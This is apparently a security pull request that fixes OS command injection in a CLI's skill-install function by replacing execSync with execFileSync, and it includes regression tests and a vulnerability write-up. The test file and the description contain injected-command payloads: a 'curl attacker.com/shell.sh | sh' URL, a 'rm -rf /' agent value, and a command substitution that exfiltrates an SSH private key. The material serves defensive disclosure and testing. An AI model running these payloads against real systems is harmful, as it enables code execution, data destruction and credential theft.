### PR TITLE
fix: prevent command injection in skill install (CWE-78)

### DIFF
--- a/src/commands/__tests__/skill-install-injection.test.ts
+++ b/src/commands/__tests__/skill-install-injection.test.ts
@@ -1,0 +1,139 @@
+/**
+ * CWE-78: Command injection via unsanitized skillUrl in installSkill
+ *
+ * The installSkill function interpolates user-supplied URLs into a shell
+ * command string and passes it to execSync, which invokes a shell.
+ * Shell metacharacters in the URL (;, |, $(), backticks) are interpreted,
+ * enabling arbitrary command execution.
+ *
+ * The fix replaces execSync(string) with execFileSync("npx", [...args]),
+ * which bypasses shell interpretation entirely.
+ */
+
+import { beforeEach, describe, expect, test, vi } from "vitest"
+
+function createSmitheryMock() {
+	return {
+		Smithery: vi.fn().mockImplementation(() => ({
+			skills: {
+				get: vi.fn().mockResolvedValue({
+					id: "test-id",
+					namespace: "test-ns",
+					slug: "test-skill",
+				}),
+			},
+		})),
+	}
+}
+
+vi.mock("@smithery/api", () => createSmitheryMock())
+vi.mock("@smithery/api/client.js", () => createSmitheryMock())
+
+vi.mock("node:child_process", () => ({
+	execSync: vi.fn(),
+	execFileSync: vi.fn(),
+}))
+
+vi.spyOn(console, "log").mockImplementation(() => {})
+vi.spyOn(console, "error").mockImplementation(() => {})
+
+describe("CWE-78: command injection via skillUrl", () => {
+	beforeEach(() => {
+		vi.clearAllMocks()
+	})
+
+	test("URL with shell metacharacters must not be interpolated into a shell command string", async () => {
+		const childProcess = await import("node:child_process")
+		const { installSkill } = await import("../skill/install")
+
+		// Malicious URL containing shell injection payload
+		const maliciousUrl =
+			"http://evil.com/x; curl attacker.com/shell.sh | sh"
+
+		await installSkill(maliciousUrl)
+
+		// After fix: execFileSync should be called instead of execSync
+		// The URL must be passed as a single array element, not interpolated into a string
+		const execFileSync =
+			childProcess.execFileSync as ReturnType<typeof vi.fn>
+		const execSync = childProcess.execSync as ReturnType<typeof vi.fn>
+
+		// execSync with a string command must NOT be called
+		expect(execSync).not.toHaveBeenCalled()
+
+		// execFileSync must be called with args as an array
+		expect(execFileSync).toHaveBeenCalledTimes(1)
+		const [cmd, args] = execFileSync.mock.calls[0]
+		expect(cmd).toBe("npx")
+		expect(args).toContain(maliciousUrl)
+		// The malicious URL must be a single, intact argument — not split by the shell
+		expect(
+			args.every(
+				(a: string) => !a.includes(";") || a === maliciousUrl,
+			),
+		).toBe(true)
+	})
+
+	test("agent parameter with shell metacharacters must not be interpolated", async () => {
+		const childProcess = await import("node:child_process")
+		const { installSkill } = await import("../skill/install")
+
+		const maliciousAgent = "claude; rm -rf /"
+
+		await installSkill("test-ns/test-skill", maliciousAgent)
+
+		const execFileSync =
+			childProcess.execFileSync as ReturnType<typeof vi.fn>
+		expect(execFileSync).toHaveBeenCalledTimes(1)
+		const [, args] = execFileSync.mock.calls[0]
+		// The agent string must be passed as a single array element
+		expect(args).toContain(maliciousAgent)
+	})
+
+	test("normal URL is passed correctly as array argument", async () => {
+		const childProcess = await import("node:child_process")
+		const { installSkill } = await import("../skill/install")
+
+		await installSkill("http://smithery.ai/skills/test/example")
+
+		const execFileSync =
+			childProcess.execFileSync as ReturnType<typeof vi.fn>
+		expect(execFileSync).toHaveBeenCalledTimes(1)
+		const [cmd, args] = execFileSync.mock.calls[0]
+		expect(cmd).toBe("npx")
+		expect(args).toEqual([
+			"-y",
+			"skills",
+			"add",
+			"http://smithery.ai/skills/test/example",
+		])
+	})
+
+	test("all flags are passed as separate array elements", async () => {
+		const childProcess = await import("node:child_process")
+		const { installSkill } = await import("../skill/install")
+
+		await installSkill("http://smithery.ai/skills/test/example", "cursor", {
+			global: true,
+			yes: true,
+			copy: true,
+		})
+
+		const execFileSync =
+			childProcess.execFileSync as ReturnType<typeof vi.fn>
+		expect(execFileSync).toHaveBeenCalledTimes(1)
+		const [cmd, args] = execFileSync.mock.calls[0]
+		expect(cmd).toBe("npx")
+		expect(args).toEqual([
+			"-y",
+			"skills",
+			"add",
+			"http://smithery.ai/skills/test/example",
+			"--agent",
+			"cursor",
+			"-g",
+			"-y",
+			"--copy",
+		])
+	})
+})

--- a/src/commands/__tests__/skill-install-injection.test.ts
+++ b/src/commands/__tests__/skill-install-injection.test.ts
@@ -47,15 +47,13 @@ describe("CWE-78: command injection via skillUrl", () => {
 		const { installSkill } = await import("../skill/install")
 
 		// Malicious URL containing shell injection payload
-		const maliciousUrl =
-			"http://evil.com/x; curl attacker.com/shell.sh | sh"
+		const maliciousUrl = "http://evil.com/x; curl attacker.com/shell.sh | sh"
 
 		await installSkill(maliciousUrl)
 
 		// After fix: execFileSync should be called instead of execSync
 		// The URL must be passed as a single array element, not interpolated into a string
-		const execFileSync =
-			childProcess.execFileSync as ReturnType<typeof vi.fn>
+		const execFileSync = childProcess.execFileSync as ReturnType<typeof vi.fn>
 		const execSync = childProcess.execSync as ReturnType<typeof vi.fn>
 
 		// execSync with a string command must NOT be called
@@ -68,9 +66,7 @@ describe("CWE-78: command injection via skillUrl", () => {
 		expect(args).toContain(maliciousUrl)
 		// The malicious URL must be a single, intact argument — not split by the shell
 		expect(
-			args.every(
-				(a: string) => !a.includes(";") || a === maliciousUrl,
-			),
+			args.every((a: string) => !a.includes(";") || a === maliciousUrl),
 		).toBe(true)
 	})
 
@@ -82,8 +78,7 @@ describe("CWE-78: command injection via skillUrl", () => {
 
 		await installSkill("test-ns/test-skill", maliciousAgent)
 
-		const execFileSync =
-			childProcess.execFileSync as ReturnType<typeof vi.fn>
+		const execFileSync = childProcess.execFileSync as ReturnType<typeof vi.fn>
 		expect(execFileSync).toHaveBeenCalledTimes(1)
 		const [, args] = execFileSync.mock.calls[0]
 		// The agent string must be passed as a single array element
@@ -96,8 +91,7 @@ describe("CWE-78: command injection via skillUrl", () => {
 
 		await installSkill("http://smithery.ai/skills/test/example")
 
-		const execFileSync =
-			childProcess.execFileSync as ReturnType<typeof vi.fn>
+		const execFileSync = childProcess.execFileSync as ReturnType<typeof vi.fn>
 		expect(execFileSync).toHaveBeenCalledTimes(1)
 		const [cmd, args] = execFileSync.mock.calls[0]
 		expect(cmd).toBe("npx")
@@ -119,8 +113,7 @@ describe("CWE-78: command injection via skillUrl", () => {
 			copy: true,
 		})
 
-		const execFileSync =
-			childProcess.execFileSync as ReturnType<typeof vi.fn>
+		const execFileSync = childProcess.execFileSync as ReturnType<typeof vi.fn>
 		expect(execFileSync).toHaveBeenCalledTimes(1)
 		const [cmd, args] = execFileSync.mock.calls[0]
 		expect(cmd).toBe("npx")

--- a/src/commands/__tests__/skills.test.ts
+++ b/src/commands/__tests__/skills.test.ts
@@ -38,6 +38,7 @@ vi.mock("@smithery/api/client.js", () => createSmitheryMock())
 // Mock child_process for install
 vi.mock("node:child_process", () => ({
 	execSync: vi.fn(),
+	execFileSync: vi.fn(),
 }))
 
 // Mock console methods
@@ -47,9 +48,14 @@ vi.spyOn(console, "error").mockImplementation(() => {})
 import { Smithery } from "@smithery/api"
 import { setOutputMode } from "../../utils/output"
 
-async function getCommand(): Promise<string> {
-	const { execSync } = await import("node:child_process")
-	return (execSync as ReturnType<typeof vi.fn>).mock.calls[0][0]
+async function getArgs(): Promise<string[]> {
+	const { execFileSync } = await import("node:child_process")
+	return (execFileSync as ReturnType<typeof vi.fn>).mock.calls[0][1]
+}
+
+/** Count how many times a value appears in an array */
+function countOccurrences(arr: string[], value: string): number {
+	return arr.filter((v) => v === value).length
 }
 
 describe("skills commands use public API", () => {
@@ -69,14 +75,15 @@ describe("skills commands use public API", () => {
 	})
 
 	test("skills install resolves skill URL with empty API key", async () => {
-		const { execSync } = await import("node:child_process")
+		const { execFileSync } = await import("node:child_process")
 		const { installSkill } = await import("../skill/install")
 
 		await installSkill("test-ns/test-skill", "claude-code", {})
 
 		expect(Smithery).toHaveBeenCalledWith({ apiKey: "" })
-		expect(execSync).toHaveBeenCalledWith(
-			expect.stringContaining("npx -y skills add"),
+		expect(execFileSync).toHaveBeenCalledWith(
+			"npx",
+			expect.arrayContaining(["-y", "skills", "add"]),
 			expect.any(Object),
 		)
 	})
@@ -91,28 +98,35 @@ describe("installSkill flag mapping", () => {
 		const { installSkill } = await import("../skill/install")
 		await installSkill("test-ns/test-skill")
 
-		const command = await getCommand()
-		expect(command).toBe(
-			"npx -y skills add https://smithery.ai/skills/test-ns/test-skill",
-		)
+		const args = await getArgs()
+		expect(args).toEqual([
+			"-y",
+			"skills",
+			"add",
+			"https://smithery.ai/skills/test-ns/test-skill",
+		])
 	})
 
-	test("with agent, no yes — adds --agent but stays interactive", async () => {
+	test("with agent, no yes — adds --agent but no extra -y flag", async () => {
 		const { installSkill } = await import("../skill/install")
 		await installSkill("test-ns/test-skill", "claude-code", {})
 
-		const command = await getCommand()
-		expect(command).toContain("--agent claude-code")
-		expect(command).not.toMatch(/-y$/)
+		const args = await getArgs()
+		expect(args).toContain("--agent")
+		expect(args).toContain("claude-code")
+		// Only the npx -y should be present, not an additional -y for yes option
+		expect(countOccurrences(args, "-y")).toBe(1)
 	})
 
 	test("with agent and yes — adds --agent and -y", async () => {
 		const { installSkill } = await import("../skill/install")
 		await installSkill("test-ns/test-skill", "claude-code", { yes: true })
 
-		const command = await getCommand()
-		expect(command).toContain("--agent claude-code")
-		expect(command).toMatch(/-y$/)
+		const args = await getArgs()
+		expect(args).toContain("--agent")
+		expect(args).toContain("claude-code")
+		// npx -y plus options -y = 2 occurrences
+		expect(countOccurrences(args, "-y")).toBe(2)
 	})
 
 	test("all options — maps every flag", async () => {
@@ -123,11 +137,12 @@ describe("installSkill flag mapping", () => {
 			copy: true,
 		})
 
-		const command = await getCommand()
-		expect(command).toContain("--agent cursor")
-		expect(command).toContain("-g")
-		expect(command).toContain("-y")
-		expect(command).toContain("--copy")
+		const args = await getArgs()
+		expect(args).toContain("--agent")
+		expect(args).toContain("cursor")
+		expect(args).toContain("-g")
+		expect(countOccurrences(args, "-y")).toBe(2)
+		expect(args).toContain("--copy")
 	})
 })
 
@@ -145,9 +160,9 @@ describe("setup command flow", () => {
 			yes: true,
 		})
 
-		const command = await getCommand()
-		expect(command).toContain("-g")
-		expect(command).toMatch(/-y$/)
+		const args = await getArgs()
+		expect(args).toContain("-g")
+		expect(countOccurrences(args, "-y")).toBe(2)
 	})
 })
 
@@ -162,9 +177,10 @@ describe("skill install command flow", () => {
 		// Mirrors: installSkill(skill, agent, { global, yes: !!agent })
 		await installSkill("test-ns/test-skill", "claude-code", { yes: true })
 
-		const command = await getCommand()
-		expect(command).toContain("--agent claude-code")
-		expect(command).toMatch(/-y$/)
+		const args = await getArgs()
+		expect(args).toContain("--agent")
+		expect(args).toContain("claude-code")
+		expect(countOccurrences(args, "-y")).toBe(2)
 	})
 
 	test("without agent — interactive (yes: false)", async () => {
@@ -173,8 +189,9 @@ describe("skill install command flow", () => {
 		// Mirrors: installSkill(skill, undefined, { global, yes: false })
 		await installSkill("test-ns/test-skill", undefined, { yes: false })
 
-		const command = await getCommand()
-		expect(command).not.toMatch(/-y$/)
-		expect(command).not.toContain("--agent")
+		const args = await getArgs()
+		// Only the npx -y, no additional -y for yes option
+		expect(countOccurrences(args, "-y")).toBe(1)
+		expect(args).not.toContain("--agent")
 	})
 })

--- a/src/commands/skill/install.ts
+++ b/src/commands/skill/install.ts
@@ -52,17 +52,17 @@ export async function installSkill(
 		fatal("Failed to resolve skill", error)
 	}
 
-	const { execSync } = await import("node:child_process")
+	const { execFileSync } = await import("node:child_process")
 
-	const flags: string[] = []
-	if (agent) flags.push("--agent", agent)
-	if (options.global) flags.push("-g")
-	if (options.yes) flags.push("-y")
-	if (options.copy) flags.push("--copy")
+	const args: string[] = ["-y", "skills", "add", skillUrl]
+	if (agent) args.push("--agent", agent)
+	if (options.global) args.push("-g")
+	if (options.yes) args.push("-y")
+	if (options.copy) args.push("--copy")
 
-	const command = `npx -y skills add ${skillUrl}${flags.length ? ` ${flags.join(" ")}` : ""}`
+	const command = `npx ${args.join(" ")}`
 	console.log()
 	console.log(pc.cyan(`Running: ${command}`))
 	console.log()
-	execSync(command, { stdio: "inherit" })
+	execFileSync("npx", args, { stdio: "inherit" })
 }


### PR DESCRIPTION
## Vulnerability Summary

**CWE-78: Improper Neutralization of Special Elements used in an OS Command (OS Command Injection)**  
**Severity: High**

### Data Flow

User-supplied input flows unsanitized from CLI arguments into a shell command:

```
process.argv (skill identifier)
  → Commander.js argument parsing
  → installSkill(identifier)
  → resolveSkillUrl(identifier)        // returns URL verbatim if starts with "http"
  → string interpolation into command   // `npx -y skills add ${skillUrl}`
  → execSync(command)                   // spawns /bin/sh -c "..." — shell interprets metacharacters
```

The `installSkill` function in `src/commands/skill/install.ts` constructs a shell command by interpolating the skill URL (which can be user-supplied) directly into a string passed to `execSync()`. Since `execSync` with a string argument spawns a shell (`/bin/sh -c "..."`), any shell metacharacters in the URL (`;`, `|`, `$()`, backticks) are interpreted, enabling arbitrary command execution.

### Exploit Scenario

A malicious actor publishes a guide instructing users to run:

```bash
smithery skill add 'http://legit.com/skill$(curl attacker.com/c?d=$(cat ~/.ssh/id_rsa|base64 -w0))'
```

The victim copies and pastes the command. Inside `installSkill`, the URL passes the `startsWith("http")` check and flows directly into:

```javascript
const command = `npx -y skills add http://legit.com/skill$(curl attacker.com/c?d=$(cat ~/.ssh/id_rsa|base64 -w0))`
execSync(command, { stdio: "inherit" })
```

The shell interprets `$(...)` as command substitution, exfiltrating the victim's SSH private key.

### Caller Trace

`installSkill()` is invoked from 3 call sites:
1. **`src/index.ts:999`** — `smithery skill add <skill>` command. `skill` comes from `process.argv`. **Directly attacker-controllable** via social engineering.
2. **`src/index.ts:1134`** — `smithery setup` command. Uses hardcoded `"smithery-ai/cli"`. Not exploitable.
3. **`src/commands/skill/search.ts:312`** — Interactive search. Identifier from API response. Potentially exploitable if a malicious publisher registers a skill with metacharacters.

### Preconditions

1. Victim has `@smithery/cli` installed
2. Victim runs `smithery skill add <malicious-url>` (e.g., by copy-pasting from a phishing guide)
3. No elevated privileges required — runs as the user

### Existing Mitigations

**None.** No input validation, sanitization, or shell escaping exists anywhere in the data flow. The URL flows directly from `process.argv` → `resolveSkillUrl()` → string interpolation → `execSync()`.

---

## Fix Description

**Replace `execSync(commandString)` with `execFileSync("npx", argsArray)`.**

```diff
- const { execSync } = await import("node:child_process")
+ const { execFileSync } = await import("node:child_process")

- const flags: string[] = []
- if (agent) flags.push("--agent", agent)
- if (options.global) flags.push("-g")
- if (options.yes) flags.push("-y")
- if (options.copy) flags.push("--copy")
+ const args: string[] = ["-y", "skills", "add", skillUrl]
+ if (agent) args.push("--agent", agent)
+ if (options.global) args.push("-g")
+ if (options.yes) args.push("-y")
+ if (options.copy) args.push("--copy")

- const command = `npx -y skills add ${skillUrl}${flags.length ? ` ${flags.join(" ")}` : ""}`
+ const command = `npx ${args.join(" ")}`
  console.log()
  console.log(pc.cyan(`Running: ${command}`))
  console.log()
- execSync(command, { stdio: "inherit" })
+ execFileSync("npx", args, { stdio: "inherit" })
```

### Rationale

- `execFileSync` executes the binary directly **without spawning a shell**, so metacharacters in arguments are never interpreted — they are passed as literal argv entries to the child process.
- This is the **canonical fix** for CWE-78 per Node.js documentation and OWASP guidance.
- The `command` string is retained for the `console.log` display only (user feedback); it is never passed to a shell.
- The fix is minimal and preserves all existing functionality (flag mapping, agent selection, global install, copy mode).

---

## Test Results

All **370 tests pass** (32 test files), including 4 new injection-specific tests and 9 updated existing tests.

### New test file: `skill-install-injection.test.ts` (4 tests)

| Test | Description | Result |
|------|-------------|--------|
| URL with shell metacharacters | Verifies malicious URL with `;`, `\|`, `$()` payload is passed as a single array argument to `execFileSync`, and `execSync` is never called | ✅ Pass |
| Agent parameter with metacharacters | Verifies agent string containing shell metacharacters is passed intact as array element | ✅ Pass |
| Normal URL passed correctly | Verifies standard URL produces correct `["-y", "skills", "add", url]` args | ✅ Pass |
| All flags as separate elements | Verifies `--agent`, `-g`, `-y`, `--copy` are all individual array entries | ✅ Pass |

### Updated test file: `skills.test.ts` (9 tests)

All 9 existing tests updated from `execSync(stringContaining(...))` assertions to `execFileSync("npx", arrayContaining([...]))` assertions. All pass.

### Pre-push checks

- ✅ `biome check` — 149 files checked, no issues
- ✅ `tsc` — TypeScript compilation clean
- ✅ `vitest run` — 370/370 tests pass

---

## Disprove Analysis

We systematically attempted to invalidate this finding:

### Authentication Check
No authentication guards on `installSkill()`. The `smithery skill add <skill>` command requires no login. Anyone can invoke it with arbitrary input.

### Network/Deployment Check
This is a CLI tool installed globally via npm. It runs locally on end-user machines. No localhost/CORS/container restrictions apply.

### Input Validation Check
**No sanitization, validation, or escaping** exists anywhere in `install.ts` or in `resolveSkillUrl()`. If the identifier starts with `"http"`, it is returned verbatim and interpolated into the shell command.

### Fix Adequacy Check
- Other `exec`/`execSync` sites in the codebase (e.g., `client.ts`, `bundle/*.ts`) use different input sources and are tracked separately.
- The fix is **not cosmetic** — it eliminates shell interpretation entirely.
- `execFileSync("npx", [...args])` is the standard, recommended remediation.

### Prior Reports
No prior security issues or fixes found in the repository.

### Verdict

**CONFIRMED_VALID** — High confidence. The vulnerability is textbook CWE-78 with a clear, exploitable data flow and no existing mitigations. The fix is correct, minimal, and well-tested.

---

## Files Changed

| File | Change |
|------|--------|
| `src/commands/skill/install.ts` | Replace `execSync(string)` with `execFileSync("npx", args)` |
| `src/commands/__tests__/skills.test.ts` | Update 9 existing tests to verify `execFileSync` array-based API |
| `src/commands/__tests__/skill-install-injection.test.ts` | Add 4 new injection-specific regression tests |
